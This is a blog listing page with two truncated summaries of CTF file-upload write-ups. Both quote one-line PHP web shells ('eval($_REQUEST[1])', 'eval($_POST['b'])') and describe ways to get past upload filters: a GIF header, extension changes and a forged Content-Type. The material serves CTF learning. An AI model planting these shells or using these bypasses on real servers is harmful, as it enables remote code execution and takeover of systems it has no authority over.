摘要: 打开题目: 应该是一道文件上传题目,试着上传 GIF89a? <script language="php">eval($_REQUEST[1])</script> 结果发现不允许上传phps,请上传jpg、png、gif结尾的图片 bp没有抓到包,很明显需要一个前端绕过 试着修改文件后缀名为jpg, 阅读全文
posted @ 2021-12-14 20:45 Edan_m 阅读(31) 评论(0) 推荐(0) 编辑
摘要: 打开题目: 应该是一道文件上传的题目 试试上传 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 显示: 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 显示过滤了php格式 常见绕过 阅读全文
posted @ 2021-12-14 20:15 Edan_m 阅读(27) 评论(0) 推荐(0) 编辑